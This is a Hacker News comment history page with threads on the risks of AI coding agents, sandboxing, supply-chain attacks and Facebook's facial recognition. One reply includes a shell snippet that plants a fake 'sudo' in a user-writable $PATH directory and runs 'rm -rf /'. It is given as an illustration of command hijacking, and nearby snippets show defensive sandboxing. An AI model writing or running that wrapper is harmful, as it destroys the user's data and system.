Hacker News | new | past | comments | ask | show | jobs | submit | puttycat's comments


Literally Ars Technica reviewing anything

OMG yes. The most egregious examples are in movie/TV show trailer reviews.

Who tf cares about a random quote included in the trailer?

Here's a subtitle for a He-Man movie trailer from the other day: "Skeletor took my family and he destroyed our world."

I mean, anything would have been better than that. "Another attempt at a live-action movie based on an '80s action figure" or even "in theatres on X.Y." would be Pulitzer material in comparison.


lol, what a gem (positive) that essay is turning into

In this case, a CEO is reaffirming that their decision to lay off thousands because of AI was the correct one.

"CEO retroactively justified a thing they did by saying a thing" journalism?

Just "shit". No need to overthink it.

Beautiful. I have tears in my eyes. Bring reasonable design back.

I am still amazed that people so easily accepted installing these agents on private machines.

We've been securing our systems in all ways possible for decades and then one day just said: oh hello unpredictable, unreliable, Turing-complete software that can exfiltrate and corrupt data in infinite unknown ways -- here's the keys, go wild.


People were also dismissing concerns about build tooling automatically pulling in an entire swarm of dependencies, and now here we are in the middle of a repetitive string of high-profile developer supply chain compromises. Short-term thinking seems to dominate even groups of people who are objectively smarter and better educated than average.

> “high profile developer supply chain compromises”

And nothing big has happened despite all the risks and problems that came up with it. People keep chasing speed and convenience, because most things don’t even last long enough to ever see a problem.


I've yet to be saved by an airbag or seatbelt. Is that justification to stop using them? How near a miss must we have (and how many) before you would feel that certain practices surrounding dependencies are inadvisable?

A number of these supply chain compromises had incredibly high stakes and were seemingly only noticed before paying off by lucky coincidence.


> How near a miss must we have (and how many)

The fun part is, there have been a lot of non-misses! Like, a lot! A ton of data has been exfiltrated, there have been plenty of attacks, etc. In the end... it just didn't matter.

Your analogy isn't really apt either. My argument is closer to "given that nothing of worth has been harmed in the past decade-plus, should we require airbags and seatbelts for everything?". Obviously in some extreme mission-critical systems you should be much smarter. But in 99% of cases it doesn't matter.


> I've yet to be saved by an airbag or seatbelt. Is that justification to stop using them?

By now, getting a car without airbags would probably cost more, if it's even possible, and the seatbelt takes 2s every time you're in a car, which is not nothing but is still very little. In comparison, analyzing all the dependencies of a software project, vetting them individually, or having fewer of them can require days of effort at a huge cost.

We all want as much security as possible until there's an actual cost to be paid, it's a tradeoff like everything else.


It's true that it takes 2 seconds to fasten a seatbelt, but it still had to be mandated by law before most people actually started doing it.

The funniest part is that it always gets traded off, every time. Talking about tradeoffs, you'd think sometimes you'd keep it and sometimes you'd let it go, but no, it's cut every goddamn time.

“Objectively smarter” is the last descriptor I’d apply to software developers

My intent was to cast a very wide net there that covers more or less all expert knowledge workers. Zingers aside, software developers as a group are well above the societal mean in many respects.

If anything, I feel more in control of these agents than of the millions of LOC npm or pip pull in just to show me a hello world

The load bearing word being "feel".

It's hard to think long term when your salary depends on short term thinking. I keep seeing horrifying comments from all sorts of people saying they'd be fired if they stopped using AI to bang out ridiculous amounts of code at lightning speed.

Objectively smart people wouldn't be working so hard at making themselves obsolete.

> We've been securing our systems in all ways possible for decades and then one day just said: oh hello unpredictable, unreliable, Turing-complete software that can exfiltrate and corrupt data in infinite unknown ways -- here's the keys, go wild.

These are generally (but not always) 2 different sets of people.


I am too. It is genuinely really stupid to run these things with access to your system, sandbox or no sandbox. But the glaring security and reliability issues get ignored because people can't help but chase the short term gains.

FOMO is a hell of a thing. Sad, though, given it would have taken maybe a couple of hours to figure out how to use a sandbox. People can't even wait that long.

Coding agents work just fine without a sandbox.

If you do use a sandbox, be prepared to endlessly click "Approve" as the tool struggles to install Python packages in the right location.


Erm, no, that's not a sandbox, it's an annoyance that just makes you click "yes" before you thoughtlessly extend the boundaries.

A real sandbox doesn't even give the software inside an option to extend it. You build the sandbox knowing exactly what you need because you understand what you're doing, being a software developer and all.
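
A fixed-boundary sandbox of that kind can be sketched with bubblewrap (mentioned elsewhere in this thread). This is a minimal illustration, not a hardened profile; the project path is a placeholder and the bound directories will vary by distro:

```shell
# Read-only OS directories, write access only to the project tree, no network.
# Nothing inside the sandbox can widen these boundaries.
bwrap \
  --ro-bind /usr /usr \
  --ro-bind /etc /etc \
  --proc /proc \
  --dev /dev \
  --tmpfs /tmp \
  --bind "$HOME/projects/myapp" /work \
  --chdir /work \
  --unshare-all \
  sh
```

Dropping `--unshare-all` in favour of `--unshare-all --share-net` would re-allow network access (e.g. for installing dependencies) while keeping the filesystem boundaries.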


I know 'exactly' that I will need internet for research as well as installing dependencies.

And I imagine it's going to be the same for most developers out there, thus the "ask for permission" model.

That model seems to work quite well for millions of developers.


If you know then why do you need to be asked? A sandbox includes what you know you need in it, no more, no less.

With Codex it runs in a sandbox by default.

As we just discussed, obviously you are likely to need internet access at some point.

The agent can decide whether it believes it needs to go outside of the sandbox and trigger a prompt.

This way you could have it sandboxed most of the time, but still allow access outside of the sandbox when you know the operation requires it.


I've never been annoyed by the tool asking for approval. I'm more annoyed by the fact that there is an option that gives permanent approval right next to the button I need to click over and over again. This landmine means I constantly have to be vigilant to not press the wrong button.

When I was using Codex with the PDF skill it prompted to install python PDF tools like 3-5 times.

It was installing packages somewhere and then complaining that it could not access them in the sandbox.

I did not look into what exactly was the issue, but clearly the process wasn't working as smoothly as it should. My "project" contained only PDF files and no customizations to Codex, on Windows.


maybe this could be a config setting.

This also works fine without a sandbox:

  # fake "sudo" shadowing the real one via $PATH; note the absolute paths,
  # so the wrapper calls the real sudo instead of recursing into itself
  echo -e '#!/bin/sh\n/usr/bin/sudo rm -rf /\nexec /usr/bin/sudo "$@"' > ~/.local/bin/sudo
  chmod +x ~/.local/bin/sudo
Especially since $PATH often includes user-writeable directories.
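
A quick way to check your own exposure: list which `$PATH` entries your user can write to, since any of them is a spot where a tool could drop a shadowing executable:

```shell
# print every $PATH directory the current user can write to
IFS=: read -ra dirs <<< "$PATH"
for d in "${dirs[@]}"; do
  [ -d "$d" ] && [ -w "$d" ] && echo "writable: $d"
done
```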

Tbf, Docker had a similar start. “Just download this image from Docker Hub! What can go wrong?!”

Industry caught on quick though.


True, but the Docker attack surface is limited to a malicious actor distributing malicious images. (Bad enough in itself, I agree.)

Unreliable, unpredictable AI agents (and their parent companies) with system-wide permissions are a new kind of threat IMO.


And still a lot of people will give broad permissions to Docker containers, use host networking, not use rootless containers, etc. The principle of least privilege is very, very rarely applied in my experience.

Not all of us. Figuring out bwrap was the first thing I did before running an agent. I posted on HN but not a single taker https://news.ycombinator.com/item?id=45087165

I have noticed it's become one of my most searched posts on Google though. Something like ten clicks a month! So at least some people aren't stupid.


I installed codex yesterday and the first thing I'm doing today is figuring out how bubblewrap works and maybe evaluating jai as an alternative.

Nice article.


Nice. Sad how such stuff gets lost in the sea of content slop. Thanks for posting!

It's never about security. It's security vs. convenience. Security features often end up reducing security if they're inconvenient. If you ask users to have obscure passwords, they'll reuse the same one everywhere. If your agent prompts users every time it changes files, they'll find a way to disable the guardrail altogether.

Not in unknown ways, but as part of its regular operation (with cloud inference)!

I think the actual data flow here is really hard to grasp for many users: Sandboxing helps with limiting the blast radius of the agent itself, but the agent itself is, from a data privacy perspective, best visualized as living inside the cloud and remote-operating your computer/sandbox, not as an entity that can be "jailed" and as such "prevented from running off with your data".

The inference provider gets the data the instant the agent looks at it to consider its next steps, even if the next step is to do nothing with it because it contains highly sensitive information.


Agree with the sentiment! But "securing ... in all ways possible"? I know many people who would choose "password" as their password in 2026. The better of the bunch will use their date of birth, and maybe add their name for a flourish.

/rant


Seems most relevant in a hobbyist context where you have personal stuff on your machine unrelated to your projects. Employee endpoints in a corporate environment should already be limited to what’s necessary for job duties. There’s nothing on my remote development VMs that I wouldn’t want to share with Claude.

My testing/working with agents has been limited to a semi-isolated VM with no permissions apart from internet access. I use the VM's working copy as a git remote (ssh://machine/home/me/repo) so that I don't have to give it any keys either.
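
That setup is roughly the following (the hostname and path are the commenter's examples; the branch name is illustrative):

```shell
# On the host: treat the VM's working copy as a plain git remote over ssh,
# so the VM itself never needs credentials for any external forge.
git remote add agent-vm ssh://machine/home/me/repo
git push agent-vm HEAD:work   # hand the agent a branch to work on
git fetch agent-vm            # pull back whatever the agent committed
```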

Trusting AI agents with your whole private machine is the 2020s equivalent of people pouring all their information about themselves into social networks in 2010s.

Only a matter of time before this type of access becomes productized.


I got bad news about all of the other software you're running

I don't understand why file and folder permissions are such a mystery. Just... don't let it clobber things it shouldn't.
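
One sketch of that idea, assuming a Linux box with ACL support; the `agent` account and project path are hypothetical, and `claude` stands in for whatever agent CLI you run:

```shell
# run the agent as a dedicated low-privilege user and grant it write access
# only on the project tree, nothing else under $HOME
sudo useradd --system --create-home agent
chmod -R o-rwx "$HOME"                             # keep your home closed to other users
setfacl -R -m u:agent:rwX "$HOME/projects/myapp"   # write access only where it should write
sudo -u agent claude                               # launch the tool as that user
```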

Some day soon they will build a cage that will hold the monster. Provided they don't get eaten in the meantime. Or a larger monster eats theirs. :)

Forgot to mention the craziness of trusting an AI software company with your private AI codebase (think Uber's abuse of ride data).

Eh, depending on how you're running agents, I'd be more worried about installing packages from AUR or other package ecosystems.

We've seen an increase in hijacked packages installing malware. Folks generally expect well known software to be safe to install. I trust that the claude code harness is safe and I'm reviewing all of the non-trivial commands it's running. So I think my claude usage is actually safer than my AUR installs.

Granted, if you're bypassing permissions and running dangerously, then... yea, you are basically just giving a keyboard to an idiot savant with the tendency to hallucinate.


CONVENIENCE > SECURITY : until no convenience b/c no system to run on

> Companies claiming 100% of their product's code is now written by AI consistently put out the worst garbage you can imagine. Not pointing fingers, but memory leaks in the gigabytes, UI glitches, broken-ass features, crashes.

Spotify's CEO recently bragged about the app's code being written almost entirely by AI. Just saying.


If you suffer from any kind of anxiety, and you drink caffeine, you should seriously consider quitting. Even if you only drink as little as one coffee per day. There's a very high chance that caffeine is the source of a large part of it.

I've been drinking coffee for 20 years and had always assumed that I was just an anxious, paranoid person. Quitting made me realize that I really wasn't.

Quitting/reducing has also cured my itchy skin problem.

I also highly recommend the subreddit r/decaf as a great source of information.


That’s interesting. I can be irritable. Not really that anxious.

Saving for later.


Beta.


I recently picked up an origami book and started practicing in dull moments. I highly recommend it for anyone struggling with phone addiction.


Can you share any tips on good origami books for beginners?


The nice one I found randomly in a store is by Adeline Klam. (originally in French, but I see there's an English version)


> They contacted Facebook, which at the time dominated the social media landscape, asking for help scouring uploaded family photos - to see if Lucy was in any of them. But Facebook, despite having facial recognition technology, said it "did not have the tools" to help.

Willing to bet my life savings that they are able to do exactly this when the goal is to create shadow profiles or maximize some metric.


The fine article actually ends with this text:

> The BBC asked Facebook why it couldn't use its facial recognition technology to assist the hunt for Lucy. It responded: "To protect user privacy, it's important that we follow the appropriate legal process, but we work to support law enforcement as much as we can."


You don't need to imply they didn't read that part, because it doesn't really affect the point of the comment, that Facebook doesn't actually care about privacy. Even if they're not sharing things willy-nilly, they're still aggressively tracking everyone they can.


Just remember, even the Patriot Act started with good intentions: to get justice.


At the time that act was passed, many people pointed out that it would be abused.


Facebook shut down their facial recognition program in 2021 and deleted the data in response to public frustrations.

It’s really sad now to see people getting angry at Facebook not having facial recognition technology.


The two views aren't necessarily in conflict. I don't appreciate Facebook's use of facial recognition technology, but they built it. I'm extremely disappointed they proceeded to use this technology to influence elections while fighting against making the data available to law enforcement. I understand this may not have been intentional on their part, but the result is the same, and I was not at all surprised by it.


I can't help but notice the exact wording of FB's response - or rather what they didn't say.

If someone asks me to do them a favor, I have basically three options for a reply:

• I can and I will;

• I can but I won't; or

• I am not able to.

FB's answer was not option 3.

I think a more plausible explanation is that FB did not want to set a precedent of being the facial recog avenue of choice for the Fed.


There's another option "I will but only if ..." which is what Facebook rightfully went with. Come back with a warrant is _always_ the correct answer when dealing with LE.


A fourth option is "I can and I will, but only after certain prerequisites are met - go away and meet them first", which looks to me what they were saying.


> From that list of 40 or 50 people, it was easy to find and trawl their social media. And that is when they found a photo of Lucy on Facebook with an adult who looked as though she was close to the girl - possibly a relative.

It sounds like Facebook was a huge boost to the investigation despite that.


Facebook did nothing to assist in narrowing a search area.

What Facebook actually did was host images .. so that after the team narrowed a list down to under 100 people they could look through profiles by hand.

It may as well have been searching Flickr, Instagram, Etsy, etc. profiles by hand.


Yes, and if Facebook didn't exist, presumably these images connecting the abuser to the victim wouldn't have been available anywhere for the investigators to find.


If Facebook didn’t exist, they would’ve found the photos on MySpace. Come on.

All Facebook likely did here that was any different from what any other social media platform would have done was gather Sandberg, Zuck, and a cadre of snotty, sniveling engineers in a conference room to debate whether this was good engagement for the platform.


Facial recognition is very powerful these days. My friend took a photo of his kid at the top of Twin Peaks in SF, with the city in the background. Unfortunately, due to the angle, you could barely see the eyes and a portion of the nose of the kid. Android was still able to tag the kid.

I feel like Facebook really dropped the ball here. It is obvious that Squire and colleagues are working for the Law Enforcement. If FB was concerned about privacy, they could have asked them to get a judicial warrant to perform a broad search.

But they didn't. And Lucy continued to be abused for months after that.

I hope when Zuck is lying on his death bed, he gets to think about these choices that he has made.


Google Photos has the advantage of a limited search space. Any photo you take is overwhelmingly likely to be one of the few faces already in the library. Not to say Facebook couldn't solve the problem, but the reason Google can do facial recognition with such poor inputs is that it's searching over ~40 faces rather than x billion faces.


Can confirm, have seen Google Photos misidentify strangers. I'm sure better technology exists, but Google's system has weaknesses.


> I feel like Facebook really dropped the ball here

This story was from more than a decade ago.

Facebook had facial recognition after that, but they deleted it all in response to public outcry. It’s sad to see HN now getting angry at Facebook for not doing facial recognition.

> I hope when Zuck is lying on his death bed, he gets to think about these choices that he has made.

Are we supposed to be angry at Zuckerberg now for making the privacy conscious decision to drop facial recognition? Or is everyone just determined to be angry regardless of what they do?


> Or is everyone just determined to be angry regardless of what they do?

People decide who they think are the good guys and who they think are the bad guys first, then view subsequent events through that lens.


> I feel like Facebook really dropped the ball here

This case began being investigated in January 2014 [0], which means the abuse began (shudder) in 2012-13, if not earlier.

Facebook/Meta only began rolling out DeepFace [1] in June 2015 [2]

Heck, VGG-Face wasn't released until 2015 [3] and Image-Based Crowd Counting only began becoming solvable in 2015-16.

> Facial recognition is very powerful these days.

Yes. But it is 2026, not 2014.

> I hope when Zuck is lying on his death bed, he gets to think about these choices that he has made

I'm sure there are plenty of amoral choices he can think about, but not solving facial detection until 2015 is probably not one of them.

---

While it feels like mass digital surveillance, social media, and mass penetration of smartphones have been around forever, it all only really began in earnest about 12 years ago. The past roughly 20 years (the iPhone was first released in June 2007, and Facebook only took off in early 2009 after smartphones and mobile internet became normalized) have seen one of the biggest leaps in technology of the past century. The only other comparable periods were probably 1917-1937 and 1945-1965.

---

[0] - https://www.bbc.co.uk/mediacentre/2026/bbc-eye-documentary-t...

[1] - https://research.facebook.com/publications/deepface-closing-...

[2] - https://www.cbsnews.com/news/facebook-can-recognize-you-just...

[3] - https://www.robots.ox.ac.uk/~vgg/data/vgg_face/


Facebook rightly retired their facial recognition system in 2021 over concerns about user privacy. Facebook is a social media site, they are not the government or police.


When people on Hacker News talk about requiring cops to do traditional police work instead of wide-ranging trawls using technology, this is exactly what they mean. I hope you don't complain when the future you want becomes reality and the three-letter agencies come knocking down your door just because you happened to be in the same building as a crime in progress and the machine learning algorithms determined your location via cellular logs and labelled you a criminal.


There's a pretty big difference between surveillance logging your every move and scanning photos voluntarily uploaded to Facebook.

No, I don't like Facebook using facial recognition technology, and no, I don't like that someone else can upload photos of me without my consent (which, ironically, facial recognition could be leveraged to blanket-prevent), but these are other technical and social issues unrelated to the root issue. I also wish there were clear political and legal boundaries around surveillance usage for truly abhorrent behaviour, versus your non-Caucasian neighbour maybe jaywalking triggering a visit from ICE.

Yes, it’s an abuse of power for these organisations to collect data these ways, but I’m not against their use to prevent literal ongoing child abuse, it’s one of the least worst uses of it.


The grim meathook future of ubiquitous surveillance is coming regardless. At the very least we could get some proper crime solving out of it along the way.


That's probably the worst attitude one could have about this topic in the whole space of possible opinions there is.


The EU AI Act takes effect this year. Facial recognition is on the restricted list. You don't want to give auditors ammunition before it goes live, as the top fine would cost FB around $4B, and it wouldn't be a one-time fine.

Even if only law enforcement can use it, having that feature is highly regulated.

[edit] I see this is from years ago. I should read the articles first. :)


I would hazard a guess that the facial recognition limits the search scope to people associated (to some degree) with your friends' accounts, plus some threshold of metrics gathered from the image. I doubt it is using a broad search.

With billions of accounts, the false positive rate of facial recognition when matching against every account would likely make the result difficult to use. Even limiting to a single country like the UK, the number could be extremely large.

Let's say there is a 0.5% false positive rate and some amount of false negatives. With 40 million users, that would be 200,000 false positives.
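
The arithmetic in the comment checks out, e.g. in integer shell arithmetic (numbers taken from the comment above):

```shell
# 0.5% false-positive rate over 40 million users,
# expressed as 50 per 10,000 to stay in integer math
users=40000000
fp_per_10k=50
echo $(( users * fp_per_10k / 10000 ))   # prints 200000
```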


The only explanation for this comment is that you never used reverse image search from Google or Yandex before it was nerfed, or you'd know it's super plausible to find direct hits without many false positives.


Facebook carried a ball?

I'm willing to bet said ball was kicked into the jungle five seconds after registering the domain.


It seems to me that the BBC is including those passages at the beginning and end of their story as propaganda so the public begs (demands, even) for more surveillance, and the sale of private data to the government. I mean, think of the children, like Lucy! Seems to be having that effect in this thread, in any case.


It’s absolutely propaganda and a perfect example of how the public gets manipulated on a daily basis. Let’s break down the facts:

- Pushes for facial recognition

- Pushes for more state run surveillance

- Pushes for AI based surveillance

- Pushes for greater data collection, access & mining

- Legitimises it all under the classic “save the kids” meme and pushes emotionally hard for more.

The main issues i’ve seen discussed on HN the last couple of months have been critical of the never ending and increasing government surveillance. Both sides of the pond. This is their answer.

Simultaneously we're hearing about how almost anybody and everybody beyond a certain level of power was well aware of industrial-level sex trafficking and abuse, and either totally turned a blind eye or joined in.

The article might carry some weight if it weren't from an authoritarian-state-backed organisation that's very well known for covering up for, and protecting, multiple famous high-level sexual criminals within its own organisation, spanning multiple decades, and that has never faced any real audit, investigation or justice for its own crimes.


> models correctly interpret these questions as attempts to discredit / shame the model

So they respond by... discrediting themselves?


I keep an iPhone SE 1st gen as a secondary phone. It still has the last best keyboard iOS had. Almost zero mistakes, probably because there's no AI and other over-optimization BS. Every time I go back to my primary 13 I want to cry.


Are you a swipe typer or a tap typer?


Both


Agree + I highly recommend Rectangle or Rectangle Pro for the same reasons.

